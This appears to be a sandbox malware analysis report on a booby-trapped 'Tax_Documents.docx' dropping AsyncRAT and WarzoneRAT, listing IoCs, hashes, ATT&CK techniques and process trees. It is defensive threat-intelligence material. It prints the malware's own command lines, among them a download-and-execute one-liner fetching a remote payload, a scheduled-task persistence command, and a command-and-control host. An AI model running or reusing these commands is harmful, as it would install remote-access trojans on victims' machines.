asyncrat | 8056c874a9bc6c2204ab4ea45a6f0ef4f2de0302e367695fdfd3599e4509df55

Analysis

max time kernel
125s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220331-en
submitted
06-04-2022 17:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tax_Documents.docx
Size

290KB
MD5

e7bc410788af86fe5e41695dd0ae308b
SHA1

8d9f55c90db961ea66993fd03e148b0dc9bcec5b
SHA256

8056c874a9bc6c2204ab4ea45a6f0ef4f2de0302e367695fdfd3599e4509df55
SHA512

2cd785643c49bd7ec7939e2684d9c4d12168d68df8ad554f2a6fcf9908cbd6fda8bc96d85c5828c8cd6085505a9b4348e031a74d30dc22ba9aee818b4e80d320

Score

10^/10

asyncrat warzonerat infostealer rat

Malware Config

Extracted

Family

warzonerat

mubbibun.duckdns.org:999

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4264 4904 wscript.exe
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4264	4904	wscript.exe

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
C:\ProgramData\hahahha.sdasd~txt	asyncrat
behavioral2/memory/2792-185-0x0000000000100000-0x0000000000154000-memory.dmp	asyncrat
C:\ProgramData\hahahha.sdasd~txt	asyncrat

Warzone RAT Payload 7 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4420-162-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/4420-163-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/4420-168-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/1952-166-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/1464-171-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/740-175-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/3448-179-0x0000000000405CE2-mapping.dmp	warzonerat

Executes dropped EXE 3 IoCs

Processes:

ddond.comESETNONU.comhahahha.sdasd~txt

pid process

4448 ddond.com
2216 ESETNONU.com
2792 hahahha.sdasd~txt
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

ddond.com

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation ddond.com
Drops desktop.ini file(s) 1 IoCs

Processes:

hahahha.sdasd~txt

description ioc process

File opened for modification \??\c:\users\admin\desktop\desktop.ini hahahha.sdasd~txt

pid	process
4448	ddond.com
2216	ESETNONU.com
2792	hahahha.sdasd~txt

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation	ddond.com

description	ioc	process
File opened for modification	\??\c:\users\admin\desktop\desktop.ini	hahahha.sdasd~txt

Suspicious use of SetThreadContext 5 IoCs

Processes:

ESETNONU.com

description	pid	process	target process
PID 2216 set thread context of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 set thread context of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 set thread context of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 set thread context of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 set thread context of 3448	2216	ESETNONU.com	aspnet_regbrowsers.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4672	1952	WerFault.exe	aspnet_regbrowsers.exe
1348	1464	WerFault.exe	aspnet_regbrowsers.exe
4376	4420	WerFault.exe	aspnet_regbrowsers.exe
1484	740	WerFault.exe	aspnet_regbrowsers.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3952 schtasks.exe

pid	process
3952	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3440 taskkill.exe
4392 taskkill.exe
4716 taskkill.exe

pid	process
3440	taskkill.exe
4392	taskkill.exe
4716	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

ddond.com

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	ddond.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	ddond.com

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4520 WINWORD.EXE
4520 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

ESETNONU.com

pid process

2216 ESETNONU.com
2216 ESETNONU.com
2216 ESETNONU.com
2216 ESETNONU.com
2216 ESETNONU.com
2216 ESETNONU.com
2216 ESETNONU.com

pid	process
2216	ESETNONU.com
2216	ESETNONU.com
2216	ESETNONU.com
2216	ESETNONU.com
2216	ESETNONU.com
2216	ESETNONU.com
2216	ESETNONU.com

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

ESETNONU.comtaskkill.exetaskkill.exetaskkill.exehahahha.sdasd~txt

description	pid	process
Token: SeDebugPrivilege	2216	ESETNONU.com
Token: SeDebugPrivilege	4392	taskkill.exe
Token: SeDebugPrivilege	3440	taskkill.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeDebugPrivilege	2792	hahahha.sdasd~txt

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXE

pid	process
4520	WINWORD.EXE
4520	WINWORD.EXE
4520	WINWORD.EXE
4520	WINWORD.EXE
4520	WINWORD.EXE
4520	WINWORD.EXE
412	EXCEL.EXE
412	EXCEL.EXE
412	EXCEL.EXE
412	EXCEL.EXE
412	EXCEL.EXE
412	EXCEL.EXE
4588	EXCEL.EXE
4588	EXCEL.EXE
4588	EXCEL.EXE
4588	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEddond.comESETNONU.comcsc.exe

description	pid	process	target process
PID 4520 wrote to memory of 864	4520	WINWORD.EXE	splwow64.exe
PID 4520 wrote to memory of 864	4520	WINWORD.EXE	splwow64.exe
PID 4448 wrote to memory of 3952	4448	ddond.com	schtasks.exe
PID 4448 wrote to memory of 3952	4448	ddond.com	schtasks.exe
PID 4448 wrote to memory of 3440	4448	ddond.com	taskkill.exe
PID 4448 wrote to memory of 3440	4448	ddond.com	taskkill.exe
PID 4448 wrote to memory of 4392	4448	ddond.com	taskkill.exe
PID 4448 wrote to memory of 4392	4448	ddond.com	taskkill.exe
PID 4448 wrote to memory of 4716	4448	ddond.com	taskkill.exe
PID 4448 wrote to memory of 4716	4448	ddond.com	taskkill.exe
PID 2216 wrote to memory of 432	2216	ESETNONU.com	csc.exe
PID 2216 wrote to memory of 432	2216	ESETNONU.com	csc.exe
PID 432 wrote to memory of 4788	432	csc.exe	cvtres.exe
PID 432 wrote to memory of 4788	432	csc.exe	cvtres.exe
PID 2216 wrote to memory of 4424	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4424	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4424	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 4420	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1952	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 1464	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 740	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 3448	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 3448	2216	ESETNONU.com	aspnet_regbrowsers.exe
PID 2216 wrote to memory of 3448	2216	ESETNONU.com	aspnet_regbrowsers.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tax_Documents.docx" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4520
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:864

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:412

C:\Windows\system32\wscript.exe
wscript C:\Users\Public\update.js
1⤵
- Process spawned unexpected child process
PID:4264

C:\ProgramData\ddond.com
C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file
1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4448
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 92 /tn calsendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/dp7ty5qaghujgmw/0Back.htm/file"""
  2⤵
  - Creates scheduled task(s)
  PID:3952
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3440
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4392
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4716

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4588

C:\ProgramData\ESETNONU.com
C:\ProgramData\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://www.mediafire.com/file/dyhisehpe01yoag/mainMOB.dll/file').GetResponse().GetResponseStream()).ReadToend());
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\haceub52\haceub52.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:432
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA657.tmp" "c:\Users\Admin\AppData\Local\Temp\haceub52\CSCE7D4F99CC7D34482A82B1BBDFE7B3C3.TMP"
    3⤵
    PID:4788
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:4424
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:4420
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4420 -s 520
    3⤵
    - Program crash
    PID:4376
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 520
    3⤵
    - Program crash
    PID:4672
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 520
    3⤵
    - Program crash
    PID:1348
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:740
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 740 -s 520
    3⤵
    - Program crash
    PID:1484
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:3448
- C:\ProgramData\hahahha.sdasd~txt
  "C:\ProgramData\hahahha.sdasd~txt"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Suspicious use of AdjustPrivilegeToken
  PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4420 -ip 4420
1⤵
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1464 -ip 1464
1⤵
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1952 -ip 1952
1⤵
PID:3964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 740 -ip 740
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3448 -ip 3448
1⤵
PID:5092

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ESETNONU.com

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\ProgramData\ddond.com

Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\ProgramData\ddond.com

Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\ProgramData\hahahha.sdasd~txt

Filesize
313KB

MD5
55f92c397772b28ca0cd110a47cdef66

SHA1
d848821c21e08eacfbd531d64039bdb02888667b

SHA256
f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

SHA512
afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

Download Submit
C:\ProgramData\hahahha.sdasd~txt

Filesize
313KB

MD5
55f92c397772b28ca0cd110a47cdef66

SHA1
d848821c21e08eacfbd531d64039bdb02888667b

SHA256
f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

SHA512
afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0EF397B0-5517-4BB2-A1CD-6198A64B1308

Filesize
142KB

MD5
37254fe919ef5a8d7f30f60b5f25fe93

SHA1
746fae582bc6d7faaaa3c51914b9a04e6158dab6

SHA256
0fbe9c02d0b36fe9de9da12f6b9e84429d27e157a11aa57e25774cdcda89b02a

SHA512
d50dbb0f350b9d49d3611c097623b96b279c8ed9342637f0029b55f17171d931e7fd3bc79e8f94b1d5679176460520698ea816bfcc6a3c816c0a9c247ea5b48b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA657.tmp

Filesize
1KB

MD5
e2f4762641acbbdc8b93fd1b532230bd

SHA1
d6334c8794b0200a2527d1ef451ba768483425cf

SHA256
32738cdd1fa29e7742601c93fde687d36415a7a8715c5067d20f2027c02583b9

SHA512
8ae6927ade9ed27ceacd3e1b98a317dc2ea4219e1476e7d056b5d2bb1a02464da1f17113aec0a94a3ef262c8f49094ffa9a5824bbb593446c0ecad118bec9f59

Download Submit
C:\Users\Admin\AppData\Local\Temp\haceub52\haceub52.dll

Filesize
3KB

MD5
479e283579367d50dd07b5635c1ea9bd

SHA1
42ece1768fe9d8da2795fc2c0c4f7d366a52a85c

SHA256
c3090468fa0cff42824c5f9a5cabaa92faea238f349eeef43939d0013f0be030

SHA512
1fd296ffdd7b4af177916f059ed45f89b304f998421db528ceec7bf03ab9ef3f6b4f1a8d09105cddf13fe8a284a5936144d64939bcf8756e0024a4b63d739d61

Download Submit
C:\Users\Public\update.js

Filesize
1KB

MD5
b2a6eb01401e4a297b4e97a197af123d

SHA1
fb7334316dd8b4eba10121b023e7e35d68a8e6a6

SHA256
8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

SHA512
b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\haceub52\CSCE7D4F99CC7D34482A82B1BBDFE7B3C3.TMP

Filesize
652B

MD5
424f63064fbb4be93e4d99b9f85d97ab

SHA1
b429bdb82044aafcad805afe2a81fceb0174696a

SHA256
ba1a32cee43cee200c3de370b8d3a3b407ae5ba0e195b4169308f6fc8dd6ad84

SHA512
aa5246af5db72abee92df4265499899e5d0b11421ff91561a0e24873f2b6673d012a4e00e5f1bcd80dd0b1d85f80f22e63ee2d7ef1a8ea8b142136a32312b0ac

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\haceub52\haceub52.0.cs

Filesize
840B

MD5
268033bad46157d9949101dfdbd69f95

SHA1
14a7532c9470d058536ff71251abc55320dee08e

SHA256
17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

SHA512
09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\haceub52\haceub52.cmdline

Filesize
369B

MD5
0d9f8cf62ab5cc0fa1e804746e3b5fa2

SHA1
93b6ba6244a7f93d4a372866ad731521aabf389b

SHA256
5d23bdb8f715ae3819362f36bce621384ca6ab5c3ee247ef7a84b66c17716b92

SHA512
4d2f16dcd790cce67f4257155955f35245be1deeeade4b4b645a2cf37d2551f7dc7b145e786abb425b0724fec7b9deed0fe27c63f0224575f8de7c62cddac32e

Download Submit
memory/432-155-0x0000000000000000-mapping.dmp

Download
memory/740-175-0x0000000000405CE2-mapping.dmp

Download
memory/864-129-0x0000000000000000-mapping.dmp

Download
memory/1464-171-0x0000000000405CE2-mapping.dmp

Download
memory/1952-166-0x0000000000405CE2-mapping.dmp

Download
memory/2216-149-0x0000023C492D0000-0x0000023C492F2000-memory.dmp

Filesize
136KB

Download
memory/2216-151-0x00007FFF77BE0000-0x00007FFF786A1000-memory.dmp

Filesize
10.8MB

Download
memory/2216-152-0x0000023C61910000-0x0000023C61912000-memory.dmp

Filesize
8KB

Download
memory/2216-153-0x0000023C61913000-0x0000023C61915000-memory.dmp

Filesize
8KB

Download
memory/2216-154-0x0000023C61916000-0x0000023C61918000-memory.dmp

Filesize
8KB

Download
memory/2792-186-0x00000000007B0000-0x00000000007C2000-memory.dmp

Filesize
72KB

Download
memory/2792-189-0x00000000009B0000-0x00000000009EC000-memory.dmp

Filesize
240KB

Download
memory/2792-187-0x00007FFF77BE0000-0x00007FFF786A1000-memory.dmp

Filesize
10.8MB

Download
memory/2792-190-0x0000000000A32000-0x0000000000A34000-memory.dmp

Filesize
8KB

Download
memory/2792-191-0x000000001BA00000-0x000000001BA76000-memory.dmp

Filesize
472KB

Download
